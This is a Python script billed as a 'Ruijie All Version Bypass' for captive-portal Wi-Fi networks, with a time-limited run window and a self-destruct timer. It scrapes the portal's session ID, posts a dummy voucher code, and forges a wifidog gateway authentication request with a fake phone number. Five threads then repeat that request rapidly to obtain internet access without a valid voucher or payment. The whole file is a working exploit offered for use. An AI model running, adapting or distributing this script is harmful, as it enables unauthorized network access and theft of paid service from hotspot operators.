import requests
import re
import urllib3
import time
import threading
import logging
import random
import sys
import os
from datetime import datetime
from urllib.parse import urlparse, parse_qs, urljoin

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# ===============================
# CONFIG
# ===============================
PING_THREADS = 5
MIN_INTERVAL = 0.05
MAX_INTERVAL = 0.2
DEBUG = False

# ===============================
# FIXED DATE RANGE (ဒီမှာထည့်ထားတယ်)
# ===============================
START_DATE = datetime(2026, 4, 6, 0, 0, 0)    # 6.4.2026
END_DATE = datetime(2026, 5, 24, 23, 59, 59)   # 8.4.2026

# ===============================
# COLOR SYSTEM
# ===============================
RED = "\033[91m"
GREEN = "\033[92m"
CYAN = "\033[96m"
YELLOW = "\033[93m"
MAGENTA = "\033[95m"
RESET = "\033[0m"

# ===============================
# LOGGING
# ===============================
logging.basicConfig(
    level=logging.INFO,
    format="%(asctime)s | %(message)s",
    datefmt="%H:%M:%S"
)

stop_event = threading.Event()

# ===============================
# INTERNET CHECK
# ===============================
def check_real_internet():
    try:
        return requests.get("http://www.google.com", timeout=3).status_code == 200
    except:
        return False

# ===============================
# DATE CHECK & KILL TIMER
# ===============================
def date_check_and_kill():
    now = datetime.now()
    
    if now < START_DATE:
        print(f"\n{YELLOW}[⏳] Waiting for start date: {START_DATE.strftime('%d.%m.%Y')}{RESET}")
        while now < START_DATE and not stop_event.is_set():
            remaining = START_DATE - now
            days = remaining.days
            hours = remaining.seconds // 3600
            minutes = (remaining.seconds % 3600) // 60
            seconds = remaining.seconds % 60
            print(f"{YELLOW}[⏳] Starts in: {days}d {hours:02d}h {minutes:02d}m {seconds:02d}s{RESET}", end="\r")
            time.sleep(1)
            now = datetime.now()
        print(f"\n{GREEN}[▶] Start date reached! Running script...{RESET}")
    
    while not stop_event.is_set():
        now = datetime.now()
        
        if now >= END_DATE:
            print(f"\n{RED}{'='*60}{RESET}")
            print(f"{RED}[💀] EXPIRY DATE REACHED!{RESET}")
            print(f"{RED}[💀] Valid from: {START_DATE.strftime('%d.%m.%Y')} to {END_DATE.strftime('%d.%m.%Y')}{RESET}")
            print(f"{RED}[💀] Terminating Script...{RESET}")
            print(f"{RED}{'='*60}{RESET}")
            time.sleep(2)
            os._exit(0)
        
        remaining = END_DATE - now
        days = remaining.days
        hours = remaining.seconds // 3600
        minutes = (remaining.seconds % 3600) // 60
        seconds = remaining.seconds % 60
        
        if days > 0:
            print(f"{CYAN}[📅] Valid until: {END_DATE.strftime('%d.%m.%Y')} | Remaining: {days}d {hours:02d}h{RESET}", end="\r")
        else:
            print(f"{CYAN}[⏱] Self-destruct in: {hours:02d}:{minutes:02d}:{seconds:02d}{RESET}", end="\r")
        time.sleep(1)

# ===============================
# HACKER BANNER
# ===============================
def banner():
    start_str = START_DATE.strftime("%d.%m.%Y")
    end_str = END_DATE.strftime("%d.%m.%Y")
    print(f"""{MAGENTA}
╔════════════════════════════════════════════════════╗
║           Ruijie All Version Bypass                ║
║           Pro Terminal Edition                     ║
║           [ TIME-LIMITED MODE ]                    ║
║           Valid: {start_str} → {end_str}                ║
╚════════════════════════════════════════════════════╝
{RESET}""")

# ===============================
# HIGH SPEED PING THREAD
# ===============================
def high_speed_ping(auth_link, sid):
    session = requests.Session()
    while not stop_event.is_set():
        try:
            session.get(auth_link, timeout=5)
            print(f"{GREEN}[✓]{RESET} SID {sid} | Turbo Pulse Active     ", end="\r")
        except:
            print(f"{RED}[X]{RESET} Connection Lost...               ", end="\r")
            break
        time.sleep(random.uniform(MIN_INTERVAL, MAX_INTERVAL))

# ===============================
# MAIN PROCESS
# ===============================
def start_process():
    banner()
    
    now = datetime.now()
    if now > END_DATE:
        print(f"{RED}[✗] Current date {now.strftime('%d.%m.%Y')} is past expiry date {END_DATE.strftime('%d.%m.%Y')}{RESET}")
        print(f"{RED}[✗] Script cannot run. Exiting...{RESET}")
        sys.exit(1)
    
    logging.info(f"{CYAN}Valid from: {START_DATE.strftime('%d.%m.%Y')} to {END_DATE.strftime('%d.%m.%Y')}{RESET}")
    
    # Start date checker & kill timer
    timer_thread = threading.Thread(target=date_check_and_kill, daemon=True)
    timer_thread.start()

    while not stop_event.is_set():
        if datetime.now() < START_DATE:
            time.sleep(5)
            continue
            
        session = requests.Session()
        test_url = "http://connectivitycheck.gstatic.com/generate_204"

        try:
            r = requests.get(test_url, allow_redirects=True, timeout=5)

            if r.url == test_url:
                if check_real_internet():
                    print(f"{YELLOW}[•]{RESET} Internet Active | Waiting...     ", end="\r")
                    time.sleep(5)
                    continue

            portal_url = r.url
            parsed_portal = urlparse(portal_url)
            portal_host = f"{parsed_portal.scheme}://{parsed_portal.netloc}"

            print(f"\n{CYAN}[*] Captive Portal Detected{RESET}")

            r1 = session.get(portal_url, verify=False, timeout=10)
            path_match = re.search(r"location\.href\s*=\s*['\"]([^'\"]+)['\"]", r1.text)
            next_url = urljoin(portal_url, path_match.group(1)) if path_match else portal_url
            r2 = session.get(next_url, verify=False, timeout=10)

            sid = parse_qs(urlparse(r2.url).query).get('sessionId', [None])[0]

            if not sid:
                sid_match = re.search(r'sessionId=([a-zA-Z0-9]+)', r2.text)
                sid = sid_match.group(1) if sid_match else None

            if not sid:
                logging.warning(f"{RED}Session ID Not Found{RESET}")
                time.sleep(5)
                continue

            print(f"{GREEN}[✓]{RESET} Session ID Captured: {sid}")

            print(f"{CYAN}[*] Checking Voucher Endpoint...{RESET}")
            voucher_api = f"{portal_host}/api/auth/voucher/"

            try:
                v_res = session.post(
                    voucher_api, json={'accessCode': '123456', 'sessionId': sid, 'apiVersion': 1},
                    timeout=5
                )
                print(f"{GREEN}[✓]{RESET} Voucher API Status: {v_res.status_code}")
            except:
                print(f"{YELLOW}[!]{RESET} Voucher Endpoint Skipped")

            params = parse_qs(parsed_portal.query)
            gw_addr = params.get('gw_address', ['192.168.60.1'])[0]
            gw_port = params.get('gw_port', ['2060'])[0]

            auth_link = f"http://{gw_addr}:{gw_port}/wifidog/auth?token={sid}&phonenumber=12345"

            print(f"{MAGENTA}[*] Launching {PING_THREADS} Turbo Threads...{RESET}")

            for _ in range(PING_THREADS):
                threading.Thread(
                    target=high_speed_ping,
                    args=(auth_link, sid),
                    daemon=True
                ).start()

            while check_real_internet():
                time.sleep(5)

        except Exception as e:
            if DEBUG:
                logging.error(f"{RED}Error: {e}{RESET}")
            time.sleep(5)

# ===============================
# ENTRY POINT
# ===============================
if __name__ == "__main__":
    try:
        start_process()
    except KeyboardInterrupt:
        stop_event.set()
        print(f"\n{RED}Manual shutdown...{RESET}")
